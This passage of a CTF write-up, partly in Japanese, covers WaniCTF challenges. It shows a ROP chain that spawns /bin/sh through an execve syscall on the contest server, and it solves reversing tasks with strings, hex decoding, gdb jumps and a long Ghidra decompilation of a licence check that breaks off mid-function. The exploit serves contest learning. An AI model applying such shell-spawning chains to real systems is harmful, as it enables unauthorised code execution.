$ nc rop-normal.pwn.wanictf.org 9004 "/bin/sh" address is 0x404070 [menu] 1. append hex value 2. append "pop rdi; ret" addr 3. append "pop rsi; ret" addr 4. append "pop rdx; ret" addr 5. append "pop rax; ret" addr 6. append "syscall; ret" addr 8. show menu (this one) 9. show rop_arena 0. execute rop > 2 "pop rdi; ret" is appended > 1 hex value?: 0x404070 0x0000000000404070 is appended > 3 "pop rsi; ret" is appended > 1 hex value?: 0 0x0000000000000000 is appended > 4 "pop rdx; ret" is appended > 1 hex value?: 0 0x0000000000000000 is appended > 5 "pop rax; ret" is appended > 1 hex value?: 0x3b 0x000000000000003b is appended > 6 "syscall; ret" is appended > 9 rop_arena +--------------------+ | pop rdi; ret |<- rop start +--------------------+ | 0x0000000000404070 | +--------------------+ | pop rsi; ret | +--------------------+ | 0x0000000000000000 | +--------------------+ | pop rdx; ret | +--------------------+ | 0x0000000000000000 | +--------------------+ | pop rax; ret | +--------------------+ | 0x000000000000003b | +--------------------+ | syscall; ret | +--------------------+ > 0 rop_arena +--------------------+ | pop rdi; ret |<- rop start +--------------------+ | 0x0000000000404070 | +--------------------+ | pop rsi; ret | +--------------------+ | 0x0000000000000000 | +--------------------+ | pop rdx; ret | +--------------------+ | 0x0000000000000000 | +--------------------+ | pop rax; ret | +--------------------+ | 0x000000000000003b | +--------------------+ | syscall; ret | +--------------------+ ls chall flag.txt redir.sh cat flag.txt FLAG{now-you-can-call-any-system-calls-with-syscall}
FLAG{now-you-can-call-any-system-calls-with-syscall}
secret (Reversing)
secret keyになる文字列が隠されていないか確認してみる。
$ strings secret
:
:
Input secret key :
Incorrect
wani_is_the_coolest_animals_in_the_world!
Correct! Flag is %s
:
:
チェックが正しい時のメッセージに近いところにkeyらしきものがある。
$ ./secret
▄▀▀▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▄▄▄▄ ▄▀▀▄▀▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▀█▀▀▄
█ █ ▐ ▐ ▄▀ ▐ █ █ ▌ █ █ █ ▐ ▄▀ ▐ █ █ ▐
▀▄ █▄▄▄▄▄ ▐ █ ▐ █▀▀█▀ █▄▄▄▄▄ ▐ █
▀▄ █ █ ▌ █ ▄▀ █ █ ▌ █
█▀▀▀ ▄▀▄▄▄▄ ▄▀▄▄▄▄▀ █ █ ▄▀▄▄▄▄ ▄▀
▐ █ ▐ █ ▐ ▐ ▐ █ ▐ █
▐ ▐ ▐ ▐
Input secret key : wani_is_the_coolest_animals_in_the_world!
Correct! Flag is FLAG{ana1yze_4nd_strin6s_and_execu7e_6in}
FLAG{ana1yze_4nd_strin6s_and_execu7e_6in}
execute (Reversing)
アセンブリから実行ファイルにする。
$ as main.s -o main
生成した実行ファイルをGhidraでデコンパイルする。
undefined8 main(void) { long in_FS_OFFSET; undefined8 local_38; undefined8 local_30; undefined8 local_28; undefined8 local_20; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); local_38 = 0x6e34637b47414c46; local_30 = 0x6578655f7530795f; local_28 = 0x3168745f65347563; local_20 = 0x7d653169665f73; print(&local_38); if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; }
>>> '6e34637b47414c46'.decode('hex')[::-1]
'FLAG{c4n'
>>> '6578655f7530795f'.decode('hex')[::-1]
'_y0u_exe'
>>> '3168745f65347563'.decode('hex')[::-1]
'cu4e_th1'
>>> '7d653169665f73'.decode('hex')[::-1]
's_fi1e}'
FLAG{c4n_y0u_execu4e_th1s_fi1e}
timer (Reversing)
$ ./timer
████████╗██╗███╗ ███╗███████╗██████╗
╚══██╔══╝██║████╗ ████║██╔════╝██╔══██╗
██║ ██║██╔████╔██║█████╗ ██████╔╝
██║ ██║██║╚██╔╝██║██╔══╝ ██╔══██╗
██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
I'll show the flag when the timer is 0 seconds.
259200 seconds left.
259199 seconds left.
259198 seconds left.
259197 seconds left.
:
そのまま実行すると、フラグが表示されるまでに時間がかかる。
$ gdb -q ./timer Reading symbols from ./timer...(no debugging symbols found)...done. gdb-peda$ i func All defined functions: Non-debugging symbols: 0x0000000000001000 _init 0x0000000000001030 puts@plt 0x0000000000001040 printf@plt 0x0000000000001050 memcpy@plt 0x0000000000001060 sleep@plt 0x0000000000001070 __cxa_finalize@plt 0x0000000000001080 _start 0x00000000000010b0 deregister_tm_clones 0x00000000000010e0 register_tm_clones 0x0000000000001120 __do_global_dtors_aux 0x0000000000001160 frame_dummy 0x0000000000001170 super_complex_flag_print_function 0x000000000000141a show_description 0x000000000000149d timer 0x00000000000014ef main 0x0000000000001510 __libc_csu_init 0x0000000000001580 __libc_csu_fini 0x0000000000001588 _fini gdb-peda$ b main Breakpoint 1 at 0x14ef gdb-peda$ r Starting program: /mnt/hgfs/Shared/timer [----------------------------------registers----------------------------------] RAX: 0x5555555554ef (<main>: endbr64) RBX: 0x0 RCX: 0x555555555510 (<__libc_csu_init>: endbr64) RDX: 0x7fffffffe088 --> 0x7fffffffe3c6 ("CLUTTER_IM_MODU"...) RSI: 0x7fffffffe078 --> 0x7fffffffe3af ("/mnt/hgfs/Share"...) RDI: 0x1 RBP: 0x555555555510 (<__libc_csu_init>: endbr64) RSP: 0x7fffffffdf98 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax) RIP: 0x5555555554ef (<main>: endbr64) R8 : 0x7ffff7dced80 --> 0x0 R9 : 0x7ffff7dced80 --> 0x0 R10: 0x0 R11: 0x0 R12: 0x555555555080 (<_start>: endbr64) R13: 0x7fffffffe070 --> 0x1 R14: 0x0 R15: 0x0 [------------------------------------code-------------------------------------] Display various information of current execution context Usage: context [reg,code,stack,all] [code/stack length] Breakpoint 1, 0x00005555555554ef in main () gdb-peda$ jump *super_complex_flag_print_function Continuing at 0x555555555170. The time has come. Flag is "FLAG{S0rry_Hav3_you_b3en_wai7ing_lon6?_No_I_ju5t_g0t_her3}" [Inferior 1 (process 92114) exited normally]
タイマー実行は飛ばして、super_complex_flag_print_function関数を実行するようにしたら、フラグが表示された。
FLAG{S0rry_Hav3_you_b3en_wai7ing_lon6?_No_I_ju5t_g0t_her3}
licence (Reversing)
Ghidraでデコンパイルする。
undefined8 main(int param_1,long param_2) { int iVar1; undefined8 uVar2; FILE *__stream; char *pcVar3; long in_FS_OFFSET; char local_98 [32]; char local_78 [32]; char local_58 [72]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); if (param_1 == 2) { __stream = fopen(*(char **)(param_2 + 8),"r"); if (__stream == (FILE *)0x0) { puts("Failed to open file"); uVar2 = 1; } else { pcVar3 = fgets(local_78,0x1d,__stream); if (pcVar3 == (char *)0x0) { puts("Failed to read file"); uVar2 = 1; } else { iVar1 = strcmp(local_78,"-----BEGIN LICENCE KEY-----\n"); if (iVar1 == 0) { pcVar3 = fgets(local_58,0x41,__stream); if (pcVar3 == (char *)0x0) { puts("Failed to read file"); uVar2 = 1; } else { iVar1 = check(local_58); if (iVar1 == 0) { pcVar3 = fgets(local_98,0x1b,__stream); if (pcVar3 == (char *)0x0) { puts("Failed to read file"); uVar2 = 1; } else { iVar1 = strcmp(local_98,"-----END LICENCE KEY-----\n"); if (iVar1 == 0) { fclose(__stream); puts("Correct! This software is successfully activated!"); uVar2 = 0; } else { puts("Failed to activate."); uVar2 = 1; } } } else { puts("Failed to activate."); uVar2 = 1; } } } else { puts("Failed to activate."); uVar2 = 1; } } } } else { puts("Failed to execute. Usage: ./licence <key file name>"); uVar2 = 1; } if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return uVar2; } undefined8 check(byte *param_1) { undefined8 uVar1; if ((param_1[0xb] ^ *param_1) == 0x7e) { uVar1 = 1; } else { if ((int)(char)param_1[0x2d] + (int)(char)*param_1 == 0x80) { uVar1 = 1; } else { if ((int)(char)*param_1 - (int)(char)param_1[0x1c] == 0x18) { uVar1 = 1; } else { if (*param_1 == 0x46) { if ((int)(char)param_1[1] - (int)(char)param_1[0xd] == 0x1a) { uVar1 = 1; } else { if ((int)(char)param_1[1] - (int)(char)param_1[0x12] == 0x21) { uVar1 = 1; } else { if ((param_1[0x11] ^ param_1[1]) == 0x34) { uVar1 = 1; } else { if ((int)(char)param_1[1] - (int)(char)*param_1 == 6) { if ((int)(char)param_1[2] - (int)(char)param_1[9] == -0x1c) { uVar1 = 1; } else { if ((param_1[0x24] ^ param_1[2]) == 0x72) { uVar1 = 1; } else { if ((int)(char)param_1[2] - (int)(char)param_1[0x1c] == 0x11) { uVar1 = 1; } else { if ((param_1[1] ^ param_1[2]) == 0xd) { if ((int)(char)param_1[0x2b] + (int)(char)param_1[3] == 0xc2) { uVar1 = 1; } else { if ((int)(char)param_1[3] - (int)(char)param_1[0x11] == -0x28) { uVar1 = 1; } else { if ((int)(char)param_1[3] - (int)(char)param_1[0x18] == 0x1a) { uVar1 = 1; } else { if ((param_1[2] ^ param_1[3]) == 6) { if ((int)(char)param_1[4] - (int)(char)param_1[0x2a] == 0x1a) { uVar1 = 1; } else { if ((param_1[0x16] ^ param_1[4]) == 0x49) { uVar1 = 1; } else { if ((int)(char)param_1[3] + (int)(char)param_1[4] == 0xc6) { uVar1 = 1; } else { if ((param_1[3] ^ param_1[4]) == 0x3c) { if ((int)(char)param_1[7] + (int)(char)param_1[5] == 0x6c) { uVar1 = 1; } else { if ((*param_1 ^ param_1[5]) == 0x7a) { uVar1 = 1; } else { if (param_1[5] == param_1[0x3b]) { uVar1 = 1; } else { if ((param_1[4] ^ param_1[5]) == 0x4f) { if ((param_1[0x1c] ^ param_1[6]) == 0x5c) { uVar1 = 1; } else { if ((int)(char)param_1[6] - (int)(char)param_1[0x1b] == 3) { uVar1 = 1; } else { if ((param_1[5] ^ param_1[6]) == 0x5a) { if ((int)(char)param_1[7] - (int)(char)param_1[1] == -0x12) { uVar1 = 1; } else { if ((int)(char)param_1[0x1f] + (int)(char)param_1[7] == 0xb0) { uVar1 = 1; } else { if ((param_1[0x13] ^ param_1[7]) == 0x41 ) { uVar1 = 1; } else { if ((int)(char)param_1[7] - (int)(char)param_1[6] == -0x38) { if ((int)(char)param_1[8] - (int)(char)param_1[0x20] == 6) { uVar1 = 1; } else { if ((param_1[0x32] ^ param_1[8]) == 10) { uVar1 = 1; } else { if ((int)(char)param_1[8] - (int)(char)param_1[10] == 0x4b) { uVar1 = 1; } else { if ((param_1[7] ^ param_1[8]) == 0x44) { if ((param_1[0x24] ^ param_1[9]) == 0x67) { uVar1 = 1; } else { if ((int)(char)param_1[ 0x36] + (int)(char)param_1[9] == 0x9b) { uVar1 = 1; } else { if ((param_1[0xf] ^ param_1[9]) == 0x68) { uVar1 = 1; } else { if ((int)(char)param_1[9] - (int)(char)param_1[8] == -0x13) { if ((int)(char)param_1[10] - (int)(char)param_1[2] == -7) { uVar1 = 1; } else { if ((int)(char)param_1[0x22] + (int)(char)param_1[10] == 0x6b) { uVar1 = 1; } else { if ((param_1[9] ^ param_1[10]) == 0x6e) { if ((int)(char)*param_1 + (int)(char)param_1[0xb] == 0x7e) { uVar1 = 1; } else { if ((int)(char)param_1[0xb] - (int)(char)param_1[0x32] == -0x37) { uVar1 = 1; } else { if ((int)(char)param_1[0x23] + (int)(char)param_1[0xb] == 0xa2) { uVar1 = 1; } else { if ((int)(char)param_1[10] + (int)(char)param_1[0xb] == 0x66) { if ((param_1[0x39] ^ param_1[0xc]) == 0x3c) { uVar1 = 1; } else { if ((int)(char)param_1[0x17] + (int)(char)param_1[0xc ] == 0xda) { uVar1 = 1; } else { if ((int)(char)param_1[0xb] + (int)(char)param_1[0xc] == 0x94) { if ((param_1[0x27] ^ param_1[0xd]) == 2) { uVar1 = 1; } else { if ((param_1[0x2c] ^ param_1[0xd]) == 0xc) { uVar1 = 1; } else { if ((int)(char)param_1[0x3b] + (int)(char)param_1[0xd] == 0x6c) { uVar1 = 1; } else { if ((int)(char)param_1[0xd] - (int)(char)param_1[0xc] == -0x2b) { if ((int)(char)param_1[0xe] - (int)(char)param_1[0xf] == 0x2f) { uVar1 = 1; } else { if ((int)(char)param_1[0xe] - (int)(char)param_1[0x3b] == 0x33 ) { uVar1 = 1; } else { if ((param_1[0x2d] ^ param_1[0xe]) == 100) { uVar1 = 1; } else { if ((param_1[0xd] ^ param_1[0xe] ) == 0x6b) { if ((param_1[0x31] ^ param_1[0xf]) == 2) { uVar1 = 1; } else { if ((param_1[0x27] ^ param_1[0xf]) == 0xd) { uVar1 = 1; } else { if ((param_1[0x2f] ^ param_1[0xf]) == 0x41) { uVar1 = 1; } else { if ((param_1[0xe] ^ param_1[0xf]) == 0x6a) { if ((int)(char)param_1 [0x26] + (int)(char)param_1[0x10] == 0xda) { uVar1 = 1; } else { if ((int)(char)param_1[0x20] + (int)(char)param_1[0x10] == 0xe7) { uVar1 = 1; } else { if ((int)(char)param_1[0x3b] + (int)(char)param_1[0x10] == 0xa6) { uVar1 = 1; } else { if ((param_1[0xf] ^ param_1[0x10]) == 0x40) { if ((param_1[0xb] ^ param_1[0x11]) == 0x4d ) { uVar1 = 1; } else { if ((int)(char)param_1[0x11] - (int)(char)param_1[0x13] == -1) { uVar1 = 1; } else { if ((int)(char)param_1[0x3c] + (int)(char)param_1[0x11] == 0xa2) { uVar1 = 1; } else { if ((int)(char)param_1[0x10] + (int)(char)param_1[0x11] == 0xe5 ) { if ((param_1[0x36] ^ param_1[0x12] ) == 5) { uVar1 = 1; } else { if ((int)(char)param_1[0x12] - (int)(char)param_1[4] == -0x40) { uVar1 = 1; } else { if ((param_1[9] ^ param_1[0x12]) == 0x57) { uVar1 = 1; } else { if ((int)(char)param_1[0x12] - (int)(char)param_1[ 0x11] == -0x3d) { if ((int)(char)param_1[0x38] + (int)(char)param_1[0x13] == 0xb1) { uVar1 = 1; } else { if ((param_1[6] ^ param_1[0x13]) == 0x1d) { uVar1 = 1; } else { if ((int)(char)param_1[0xb] + (int)(char)param_1[0x13] == 0xa8) { uVar1 = 1; } else { if ((param_1[0x12] ^ param_1[0x13]) == 0x41) { if ((int)(char)param_1[0x14] - (int)(char)param_1[2] == 0x20) { uVar1 = 1; } else { if ((int)(char)param_1[0x18] + (int)(char)param_1[0x14] == 0x9b) { uVar1 = 1; } else { if ((param_1[0x2a] ^ param_1[0x14]) == 0x33) { uVar1 = 1; } else { if ((param_1[0x13] ^ param_1[0x14] ) == 0x2d) { if ((int)(char)param_1[0x15] - (int)(char)param_1[9] == 0x17) { uVar1 = 1; } else { if ((int)(char)param_1[0x17] + (int)(char)param_1[0x15] == 0xec) { uVar1 = 1; } else { if ((int)(char)param_1[0x15] - (int)(char)param_1[ 0x2f] == 8) { uVar1 = 1; } else { if ((param_1[0x14] ^ param_1[0x15]) == 0x2f) { if ((int)(char)param_1[0x33] + (int)(char)param_1[0x16] == 0x6c) { uVar1 = 1; } else { if ((int)(char)param_1[3] + (int)(char)param_1[0x16] == 0x79) { uVar1 = 1; } else { if ((param_1[0x15] ^ param_1[0x16]) == 0x40) { if ((int)(char)param_1[0x2e] + (int)(char)param_1[0x17] == 0xaf) { uVar1 = 1; } else { if ((int)(char)param_1[0x2b] + (int)(char)param_1[0x17] == 0xed) { uVar1 = 1; } else { if ((int)(char)param_1[0x17] - (int)(char)param_1[0x11] == 0x11 ) { uVar1 = 1; } else { if ((int)(char)param_1[0x16] + (int)(char)param_1[0x17] == 0xa7) { if ((int)(char)param_1[0x37] + (int)(char)param_1[0x18] == 0x6d) { uVar1 = 1; } else { if ((param_1[0x3e] ^ param_1[0x18]) == 0x4d) { uVar1 = 1; } else { if ((int)(char)param_1[0x18] - (int)(char)param_1[ 0x2c] == 1) { uVar1 = 1; } else { if ((param_1[0x17] ^ param_1[0x18]) == 0x44) { if ((int)(char)param_1[0x19] - (int)(char)param_1[0x35] == -6) { uVar1 = 1; } else { if ((param_1[5] ^ param_1[0x19]) == 0x4f) { uVar1 = 1; } else { if ((int)(char)param_1[0x22] + (int)(char)param_1[0x19] == 0xa6) { uVar1 = 1; } else { if ((int)(char)param_1[0x18] + (int)(char)param_1[0x19] == 0xa5) { if ((int)(char)param_1[0x1a] - (int)(char)*param_1 == 0x27) { uVar1 = 1; } else { if ((int)(char)param_1[0x1a] - (int)(char)param_1[0xe] == 8) { uVar1 = 1; } else { if ((int)(char)param_1[0x1a] - (int)(char)param_1[0x19] == -0xc) { if ((int)(char)param_1[0x33] + (int)(char)param_1[0x1b] == 0xaf) { uVar1 = 1; } else { if ((int)(char)param_1[0x21] + (int)(char)param_1[0x1b] == 0xe0) { uVar1 = 1; } else { if ((param_1[0x1d] ^ param_1[0x1b]) == 0x15) { uVar1 = 1; } else { if ((int)(char)param_1[ 0x1a] + (int)(char)param_1[0x1b] == 0xdb) { if ((int)(char)param_1[0x20] + (int)(char)param_1[0x1c] == 0xa1) { uVar1 = 1; } else { if ((int)(char)param_1[0x1c] - (int)(char)param_1[0x35] == -0x45) { uVar1 = 1; } else { if ((param_1[0x14] ^ param_1[0x1c]) == 0x55) { uVar1 = 1; } else { if ((int)(char)param_1[0x1b] + (int)(char)param_1[0x1c] == 0xa6) { if ((param_1[0x32] ^ param_1[0x1d]) == 0x2f) { uVar1 = 1; } else { if ((int)(char)param_1[0x1d] - (int)(char)param_1[0x34] == -4) { uVar1 = 1; } else { if ((param_1[8] ^ param_1[0x1d]) == 0x25) { uVar1 = 1; } else { if ((int)(char)param_1[0x1c] + (int)(char)param_1[0x1d] == 0x90) { if ((param_1[0x27] ^ param_1[0x1e]) == 0xf) { uVar1 = 1; } else { if ((param_1[2] ^ param_1[0x1e]) == 0x71) { uVar1 = 1; } else { if ((param_1[0x23] ^ param_1[0x1e]) == 0x58) { uVar1 = 1; } else { if ((int)(char)param_1[ 0x1e] - (int)(char)param_1[0x1d] == -0x2a) { if ((param_1[0x14] ^ param_1[0x1f]) == 0x1d) { uVar1 = 1; } else { if ((int)(char)param_1[0x37] + (int)(char)param_1[0x1f] == 0xac) { uVar1 = 1; } else { if ((int)(char)param_1[0x1f] - (int)(char)param_1[0x20] == 0x15) { uVar1 = 1; } else { if ((int)(char)param_1[0x1f] - (int)(char)param_1[0x1e] == 0x44) { if ((int)(char)param_1[0x37] + (int)(char)param_1[0x20] == 0xa1) { uVar1 = 1; } else { if ((param_1[0x3a] ^ param_1[0x20]) == 0x55) { uVar1 = 1; } else { if ((int)(char)param_1[8] + (int)(char)param_1[0x20] == 0xe6 ) { uVar1 = 1; } else { if ((int)(char)param_1[0x20] - (int)(char)param_1[0x1f] == -0xc) { if ((int)(char)param_1[0x21] - (int)(char)param_1[0x29] == 0x36) { uVar1 = 1; } else { if ((int)(char)param_1[0x11] + (int)(char)param_1[0x21] == 0xd9) { uVar1 = 1; } else { if ((int)(char)param_1[0x21] - (int)(char)*param_1 == 0x23) { uVar1 = 1; } else { if ((int)(char)param_1[ 0x21] - (int)(char)param_1[0x20] == -0xb) { if ((int)(char)param_1[0x22] - (int)(char)param_1[0x30] == -0x2a) { uVar1 = 1; } else { if ((int)(char)param_1[0x22] - (int)(char)param_1[6] == -0x37) { uVar1 = 1; } else { if ((int)(char)param_1[0x22] - (int)(char)param_1[0x16] == 5) { uVar1 = 1; } else { if ((int)(char)param_1[0x21] + (int)(char)param_1[0x22] == 0x92) { if ((param_1[0x3d] ^ param_1[0x23]) == 0x1d) { uVar1 = 1; } else { if ((int)(char)param_1[0x19] + (int)(char)param_1[0x23] == 0xe5) { uVar1 = 1; } else { if ((int)(char)param_1[0x2b] + (int)(char)param_1[0x23] == 0xea ) { uVar1 = 1; } else { if ((int)(char)param_1[0x23] - (int)(char)param_1[0x22] == 0x3c) { if ((param_1[0x18] ^ param_1[0x24]) == 10) { uVar1 = 1; } else { if ((int)(char)param_1[0x1a] + (int)(char)param_1[0x24] == 0x9e) { uVar1 = 1; } else { if ((param_1[0xc] ^ param_1[0x24]) == 0x54) { uVar1 = 1; } else { if ((int)(char)param_1[ 0x24] - (int)(char)param_1[0x23] == -0x3b) { if ((param_1[0x28] ^ param_1[0x25]) == 0x1f) { uVar1 = 1; } else { if ((int)(char)param_1[0x25] - (int)(char)param_1[0x23] == -8) { uVar1 = 1; } else { if ((param_1[0x13] ^ param_1[0x25]) == 0x16) { uVar1 = 1; } else { if ((int)(char)param_1[0x25] - (int)(char)param_1[0x24] == 0x32) { if ((int)(char)param_1[0x18] + (int)(char)param_1[0x26] == 0x99) { uVar1 = 1; } else { if ((int)(char)param_1[0x12] + (int)(char)param_1[0x26] == 0x93) { uVar1 = 1; } else { if ((int)(char)param_1[0x13] + (int)(char)param_1[0x26] == 0xd2 ) { uVar1 = 1; } else { if ((param_1[0x25] ^ param_1[0x26] ) == 0x3c) { if ((param_1[0x21] ^ param_1[0x27]) == 0x5a) { uVar1 = 1; } else { if ((param_1[0x3c] ^ param_1[0x27]) == 2) { uVar1 = 1; } else { if ((int)(char)param_1[0x27] - (int)(char)param_1[ 0x23] == -0x30) { uVar1 = 1; } else { if ((int)(char)param_1[0x26] + (int)(char)param_1[0x27] == 0x92) { if ((int)(char)param_1[0x3c] + (int)(char)param_1[0x28] == 0xaf) { uVar1 = 1; } else { if ((int)(char)param_1[0x2f] + (int)(char)param_1[0x28] == 0xef) { uVar1 = 1; } else { if ((int)(char)param_1[0x28] - (int)(char)param_1[0x3e] == 2) { uVar1 = 1; } else { if ((param_1[0x27] ^ param_1[0x28]) == 0x4b) { if ((param_1[0x1e] ^ param_1[0x29]) == 0xf) { uVar1 = 1; } else { if ((int)(char)param_1[0x3b] + (int)(char)param_1[0x29] == 0x65 ) { uVar1 = 1; } else { if ((int)(char)param_1[0x2e] + (int)(char)param_1[0x29] == 0x6d) { uVar1 = 1; } else { if ((int)(char)param_1[0x28] + (int)(char)param_1[0x29] == 0xab) { if ((int)(char)param_1[0x28] + (int)(char)param_1[0x2a] == 0xde) { uVar1 = 1; } else { if ((int)(char)param_1[0x2a] - (int)(char)param_1[ 0x2e] == 0x3c) { uVar1 = 1; } else { if ((int)(char)param_1[0x2a] - (int)(char)param_1[0xd] == 0x38) { uVar1 = 1; } else { if ((param_1[0x29] ^ param_1[0x2a]) == 0x50) { if ((param_1[0x30] ^ param_1[0x2b]) == 0x1c) { uVar1 = 1; } else { if ((param_1[4] ^ param_1[0x2b]) == 8) { uVar1 = 1; } else { if ((int)(char)param_1[0x2b] - (int)(char)param_1[0x30] == 0x1a) { uVar1 = 1; } else { if ((int)(char)param_1[0x2b] - (int)(char)param_1[0x2a] == 0x12) { if ((int)(char)param_1[0x2c] - (int)(char)param_1[0x1b] == -0x37) { uVar1 = 1; } else { if ((int)(char)param_1[0x31] + (int)(char)param_1[0x2c] == 0x73) { uVar1 = 1; } else { if ((int)(char)param_1[0x1f] + (int)(char)param_1[0x2c] == 0xb2) { uVar1 = 1; } else { if ((param_1[0x2b] ^ param_1[0x2c]) == 0x42) { if ((int)(char)param_1[0x2d] - (int)(char)param_1[10] == 4) { uVar1 = 1; } else { if ((int)(char)param_1[ 0x2d] - (int)(char)param_1[0x2b] == -0x42) { uVar1 = 1; } else { if ((int)(char)param_1[0x3f] + (int)(char)param_1[0x2d] == 0x3d) { uVar1 = 1; } else { if ((param_1[0x2c] ^ param_1[0x2d]) == 6) { if ((int)(char)param_1[0x16] + (int)(char)param_1[0x2e] == 0x67) { uVar1 = 1; } else { if ((param_1[0x2d] ^ param_1[0x2e]) == 1) { if ((param_1[0x31] ^ param_1[0x2f]) == 0x56) { uVar1 = 1; } else { if ((int)(char)param_1[0x2f] - (int)(char)param_1[5] == 0x44) { uVar1 = 1; } else { if ((int)(char)param_1[0x2b] + (int)(char)param_1[0x2f] == 0xed ) { uVar1 = 1; } else { if ((int)(char)param_1[0x2e] + (int)(char)param_1[0x2f] == 0x9e) { if ((param_1[0x23] ^ param_1[0x30]) == 0x30) { uVar1 = 1; } else { if ((int)(char)param_1[0xb] + (int)(char)param_1[0x30] == 0x9b) { uVar1 = 1; } else { if ((param_1[0x2f] ^ param_1[0x30]) == 0x31) { if ((int)(char)param_1[ 0x17] + (int)(char)param_1[0x31] == 0xb2) { uVar1 = 1; } else { if ((int)(char)param_1[0x13] + (int)(char)param_1[0x31] == 0xa7) { uVar1 = 1; } else { if ((int)(char)param_1[0x31] - (int)(char)param_1[0x1c] == 6) { uVar1 = 1; } else { if ((param_1[0x30] ^ param_1[0x31]) == 0x6b) { if ((int)(char)param_1[9] + (int)(char)param_1[0x32] == 0xce) { uVar1 = 1; } else { if ((int)(char)param_1[0x32] - (int)(char)param_1[8] == 4) { uVar1 = 1; } else { if ((int)(char)param_1[0x32] - (int)(char)param_1[0x16] == 0x48) { uVar1 = 1; } else { if ((int)(char)param_1[0x32] - (int)(char)param_1[0x31] == 0x3a ) { if ((param_1[0x3c] ^ param_1[0x33] ) == 0xd) { uVar1 = 1; } else { if ((param_1[0x11] ^ param_1[0x33]) == 0x42) { uVar1 = 1; } else { if ((param_1[0xc] ^ param_1[0x33]) == 0x55) { uVar1 = 1; } else { if ((int)(char)param_1[0x33] - (int)(char)param_1[ 0x32] == -0x3a) { if ((int)(char)param_1[0x1c] + (int)(char)param_1[0x34] == 0xa4) { uVar1 = 1; } else { if ((int)(char)param_1[0x34] - (int)(char)param_1[0xb] == 0x39) { uVar1 = 1; } else { if ((param_1[0x2d] ^ param_1[0x34]) == 0x5f) { uVar1 = 1; } else { if ((int)(char)param_1[0x33] + (int)(char)param_1[0x34] == 0xa0) { if ((int)(char)param_1[0x35] - (int)(char)param_1[0x13] == 0x11) { uVar1 = 1; } else { if ((param_1[0x14] ^ param_1[0x35]) == 0x1a) { uVar1 = 1; } else { if ((int)(char)param_1[0x35] - (int)(char)param_1[0x1b] == 6) { uVar1 = 1; } else { if ((int)(char)param_1[0x35] - (int)(char)param_1[0x34] == 0xd) { if (param_1[0x36] == param_1[5]) { uVar1 = 1; } else { if ((param_1[0x12] ^ param_1[0x36]) == 2) { uVar1 = 1; } else { if ((param_1[0x35] ^ param_1[0x36]) == 0x4c) { if ((int)(char)param_1[ 0x3c] + (int)(char)param_1[0x37] == 0x6a) { uVar1 = 1; } else { if ((int)(char)param_1[0x27] + (int)(char)param_1[0x37] == 0x6e) { uVar1 = 1; } else { if ((int)(char)param_1[0x37] - (int)(char)param_1[4] == -0x46) { uVar1 = 1; } else { if ((int)(char)param_1[0x37] - (int)(char)param_1[0x36] == -4) { if ((int)(char)param_1[0x38] - (int)(char)param_1[0x33] == 0xb) { uVar1 = 1; } else { if ((param_1[2] ^ param_1[0x38]) == 0x7d ) { uVar1 = 1; } else { if ((int)(char)param_1[0x38] - (int)(char)param_1[0x2e] == 8) { uVar1 = 1; } else { if ((int)(char)param_1[0x37] + (int)(char)param_1[0x38] == 0x66 ) { if ((param_1[0x2f] ^ param_1[0x39] ) == 0x27) { uVar1 = 1; } else { if ((int)(char)param_1[0x39] - (int)(char)param_1[0x3c] == 0x36) { uVar1 = 1; } else { if ((int)(char)param_1[0x34] + (int)(char)param_1[0x39] == 0xd3) { uVar1 = 1; } else { if ((int)(char)param_1[0x38] + (int)(char)param_1[ 0x39] == 0x94) { if ((param_1[0x12] ^ param_1[0x3a]) == 10) { uVar1 = 1; } else { if ((int)(char)param_1[0x3a] - (int)(char)param_1[9] == -0x26) { uVar1 = 1; } else { if ((int)(char)param_1[0x11] + (int)(char)param_1[0x3a] == 0xa9) { uVar1 = 1; } else { if ((int)(char)param_1[0x3a] - (int)(char)param_1[0x39] == -0x28) { if ((int)(char)param_1[0x3b] - (int)(char)param_1[0x2a] == -0x29) { uVar1 = 1; } else { if ((int)(char)param_1[0x3c] + (int)(char)param_1[0x3b] == 0x66) { uVar1 = 1; } else { if ((param_1[0x2f] ^ param_1[0x3b]) == 0x48) { uVar1 = 1; } else { if ((int)(char)param_1[0x3b] - (int)(char)param_1[0x3a] == -7 ) { if ((param_1[0x11] ^ param_1[0x3c]) == 0x4a) { uVar1 = 1; } else { if ((int)(char)param_1[0x33] + (int)(char)param_1[0x3c] == 0x65) { uVar1 = 1; } else { if ((param_1[0xe] ^ param_1[0x3c]) == 0x59) { uVar1 = 1; } else { if (param_1[0x3c] == param_1[0x3b]) { if ((int)(char)param_1[ 0x3d] - (int)(char)param_1[0x3f] == 0x6a) { uVar1 = 1; } else { if ((int)(char)param_1[0x1a] + (int)(char)param_1[0x3d] == 0xd6) { uVar1 = 1; } else { if ((param_1[0x15] ^ param_1[0x3d]) == 0x19) { uVar1 = 1; } else { if ((int)(char)param_1[0x3c] + (int)(char)param_1[0x3d] == 0x9c) { if ((int)(char)param_1[0x3e] - (int)(char)param_1[5] == 0x50) { uVar1 = 1; } else { if ((int)(char)param_1[0x19] + (int)(char)param_1[0x3e] == 0xf7) { uVar1 = 1; } else { if ((int)(char)param_1[0x31] + (int)(char)param_1[0x3e] == 0xba) { uVar1 = 1; } else { if ((int)(char)param_1[0x3e] - (int)(char)param_1[0x3d] == 0x11 ) { if ((param_1[0x2b] ^ param_1[0x3f] ) == 0x75) { uVar1 = 1; } else { if ((int)(char)param_1[0x10] + (int)(char)param_1[0x3f] == 0x85) { uVar1 = 1; } else { if ((int)(char)param_1[6] + (int)(char)param_1[0x3f] == 0x80) { uVar1 = 1; } else { if ((int)(char)param_1[0x3e] + (int)(char)param_1[ 0x3f] == 0x87) { uVar1 = 0; } else { if ((int)(char)param_1[0x3f] - (int)(char)param_1[9] == -0x4f) { uVar1 = 1; } else { if ((param_1[0x21] ^ param_1[0x3f]) == 0x6e) { uVar1 = 1; } else { if ((int)(char)param_1[0x3f] - (int)(char)param_1[0x26] 